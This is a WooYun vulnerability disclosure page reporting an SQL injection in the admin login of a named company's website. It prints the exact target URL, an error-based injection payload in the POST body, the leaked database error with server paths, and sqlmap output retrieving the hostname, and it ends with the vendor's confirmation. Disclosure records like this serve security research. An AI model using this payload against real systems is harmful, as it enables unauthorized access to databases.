当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154008

漏洞标题:楚楚街SQL注入一枚

相关厂商:醋溜科技

漏洞作者: 爱上平顶山

提交时间:2015-11-19 16:42

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

半月没上网了
打卡。

详细说明:

醋溜科技
主站:

http://www.culiu.org/admin/index.php/login/check/time-1446192228-ajax-true
post:
password=g&user=1'%22%20and%20extractvalue(1,concat(0x5c,(Select%20USER())))%23
{"status":0,"message":"ERROR: MySQL Query Error<br>\n\t\t\t\t\t<b>SQL<\/b>: SELECT * FROM dc_admin WHERE user=\"1'\" and extractvalue(1,concat(0x5c,(Select USER())))#\" LIMIT 1<br>\n\t\t\t\t\t<b>\u9519\u8bef\u8be6\u60c5<\/b>: XPATH syntax error: '\\[email protected]'<br>\n\t\t\t\t\t<b>\u9519\u8bef\u4ee3\u7801<\/b>:1105<br><br>FILE:\/web\/culiuorg\/system\/core\/cpError.class.php<br>LINE:60<br>LEVEL:0<br>TRACE:[2015-11-16 18:14:04] \/web\/culiuorg\/system\/core\/cpApp.class.php (83) cpError::show()<br \/>\r\n[2015-11-16 18:14:04] \/web\/culiuorg\/admin\/index.php (37) cpApp->run()<br \/>\r\n"}
[email protected]
sql-shell> @@hostname
[14:29:35] [INFO] fetching SQL query output: '@@hostname'
[14:29:35] [PAYLOAD] 1" AND EXTRACTVALUE(9735,CONCAT(0x5c,0x7167637671,(MID((IFN
ULL(CAST(@@hostname AS CHAR),0x20)),1,50)),0x716c766e71)) AND "iVmz"="iVmz
[14:29:36] [INFO] retrieved: Tencent64
[14:29:36] [DEBUG] performed 1 queries in 0.24 seconds
@@hostname: 'Tencent64'


QQ20151117-1@2x.png


QQ20151117-2@2x.png


ok

漏洞证明:

···

修复方案:

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-11-23 15:59

厂商回复:

感谢通知,我们会立刻处理

最新状态:

暂无